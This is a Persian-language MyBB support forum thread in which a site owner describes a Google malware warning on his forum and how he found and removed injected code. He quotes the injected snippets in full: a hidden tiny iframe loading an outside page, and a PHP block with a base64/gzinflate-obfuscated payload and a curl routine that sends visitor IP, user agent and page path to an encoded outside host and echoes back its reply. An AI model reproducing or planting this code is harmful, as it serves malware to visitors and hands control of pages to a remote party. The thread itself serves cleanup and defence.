مرجع پارسی MyBB

مرجع پارسی MyBB > ارتباط با شما > مشکلات محصولات معرفی شده > مشکلات دیگر > مشکل Malware Detected
نسخه‌ی کامل: مشکل Malware Detected
شما درحال مشاهده‌ی نسخه‌ی متنی این صفحه می‌باشید. مشاهده‌ی نسخه‌ی کامل با قالب‌بندی مناسب.

heavaz60

۱۳۹۱/۲/۱، ۱۵:۴۴:۴۴ عصر
امروز انجمن خودم رو باز کردم و با همچین اروری مواجه شدم :
www.madarshohar.com contains content from www.103fm.net, a site known to distribute malware. Your computer might catch a virus if you visit this site.
Google has found malicious software may be installed onto your computer if you proceed. If you've visited this site in the past or you trust this site, it's possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.
We have already notified www.103fm.net that we found malware on the site. For more about the problems found on www.103fm.net, visit the Google Safe Browsing diagnostic page.

اینم عکسش ! :

[attachment=6322]

kamyar96

۱۳۹۱/۲/۱، ۱۶:۰۱:۱۰ عصر
سایت شما الوده تشخیص داده شده

heavaz60

۱۳۹۱/۲/۲، ۱۰:۲۹:۱۴ صبح
راه حل چیه ؟ اصلا چرا اینجوری شده !؟

heavaz60

۱۳۹۱/۳/۴، ۱۱:۴۰:۴۹ صبح
بعد از کلی سرچ متوجه شدم از طریق گوگل وب مستر میشه فهمید حدودا مشکل از کجاست
. مشکل ز این بود که یک سری کد به سیستم من inject شده بود . بیشتر توی فایل های index.html اما توی فایل htaccess. هم inject شده بود .

کد تقریبا چیزی مثل زیر بود :

کد php:
<!--b58b6f--><script type="text/javascript">document.write('<iframe src="http://rec-creations.com/adv.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');</script><!--/b58b6f--> 

من کل فایل های روی هاست رو دانلود کردم و با نوت پد ++ درونشون رو جستجو کردم و همه کد ها رو حذف کردم . اما توی صفحه اول هنوز وقتی با گوگل کرو راست کلیک می کنم و روی inspect element مروم این کد رو می بینم :

کد php:
<iframe src="http://rec-creations.com/adv.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe

چجوری بفهمم این کد از کجا داره لود میشه !؟

AR@KST@R

۱۳۹۱/۳/۵، ۱۱:۴۱:۲۰ صبح
همون راهی که پشت تلفن گفتم فکر کنم بهرین راه باشه !

heavaz60

۱۳۹۱/۳/۱۷، ۱۰:۲۸:۲۵ صبح
بعد از جستجوی فراوان متوجه شدم که در اکثر فایل های index.php هم یکسری کد inject شده.

مشکل این بود که کد های inject شده در فایل index شامل هیچ عبارت مشخصی نبودند که به راحتی بشه از طریق سرچ اونها رو پیدا کرد . این کدها وارد شده بودند :

کد php:
#b58b6f#
echo(gzinflate(base64_decode("JY5NDsIgEIWvQmZTXVgSlwqcwgsgjGVMC2Q6bfX2Urt7+fL+zByYqij5VrQg+BH99qs/KLhYwjJhln5jEjx1hl7sJ1QzBwtJpN60ZgyXwOiFSp77UCbt49rXVEHl5rXw2EgEGVRrLeNIebDgFymg/mXPwhHZQm7AjzRkC6FN7oGENCSxcAW1UZS0K2f0ccJ157vRx1P3Aw==")));
#/b58b6f#
?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry 1;
    // This code use for global bot statistic
    $sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle NULL;
    $stCurlLink "";
    if((strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink base64_decode'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    curl_setopt($stCurlHandleCURLOPT_TIMEOUT12);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O"
     {$sResult[0]=" ";
      echo $sResult// Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

بعد از حذف همه این کدها مشکل حل شده . و بطور خلاصه در فایلهای index.html و index.php و .htaccess کد هایی وارد شده بودند

توصیه من اینه که سطح دسترسی همه این فایل ها رو روی 444 بگذارید . پسوردتون رو هر از چند وقتی تغییر بدهید و برید توی روت و تمام فایلها و فولدر ها رو انتخاب کنید و از همه یک compress گیری بکنید و بگذارید همونجا بمونه که در صورت وقوع مشکلات اینچنینی به راحتی همون فایل فشرده رو extract کنید
مرجع پارسی MyBB > ارتباط با شما > مشکلات محصولات معرفی شده > مشکلات دیگر > مشکل Malware Detected